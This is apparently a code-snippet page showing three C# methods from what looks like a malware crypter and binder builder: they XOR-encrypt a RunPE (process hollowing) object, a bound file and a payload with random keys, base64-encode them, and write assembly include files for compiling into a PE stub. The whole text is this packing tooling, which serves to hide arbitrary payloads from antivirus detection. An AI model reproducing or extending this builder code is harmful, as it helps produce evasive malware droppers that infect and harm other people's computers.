Esempio n. 1
0
        public static void EncryptCodeAndAddKey(NewPE PE)
        {
            byte[] pKey = new byte[16];
            Keys.PopulateBuffer(pKey);

            byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
            Xor.EncodeDecodeData(pRunPE, pKey);

            if (File.Exists(PE.PeDirectory.RunPEObjectPath))
            {
                File.Delete(PE.PeDirectory.RunPEObjectPath);
            }

            PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);

            string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
            string Format     = pKey.ToASMBuffer();

            if (File.Exists(KeyInclude))
            {
                File.Delete(KeyInclude);
            }

            File.WriteAllText(KeyInclude, Format);

            PEFactory.CompileDataSection(PE);
        }
Esempio n. 2
0
        public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
        {
            byte[] pKey  = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
            byte[] pBind = BindPath.ReadBytes();

            Xor.EncodeDecodeData(pBind, pKey);
            pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind));

            if (File.Exists(PE.PeDirectory.BindIncPath))
            {
                File.Delete(PE.PeDirectory.BindIncPath);
            }

            File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind);
        }
Esempio n. 3
0
        public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
        {
            byte[] pKey = new byte[16];
            Keys.PopulateBuffer(pKey);

            byte[] pFileBuffer = PayloadPath.ReadBytes();
            Xor.EncodeDecodeData(pFileBuffer, pKey);

            pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));

            string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
            string Format = "PAYLOAD_LENGTH EQU 0x{0}";

            Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));

            if (File.Exists(PayloadLengthInclude))
            {
                File.Delete(PayloadLengthInclude);
            }

            File.WriteAllText(PayloadLengthInclude, Format);

            string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
            string PayloadInclude    = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");

            if (File.Exists(PayloadKeyInclude))
            {
                File.Delete(PayloadKeyInclude);
            }

            if (File.Exists(PayloadInclude))
            {
                File.Delete(PayloadInclude);
            }

            File.WriteAllBytes(PayloadKeyInclude, pKey);
            File.WriteAllBytes(PayloadInclude, pFileBuffer);
        }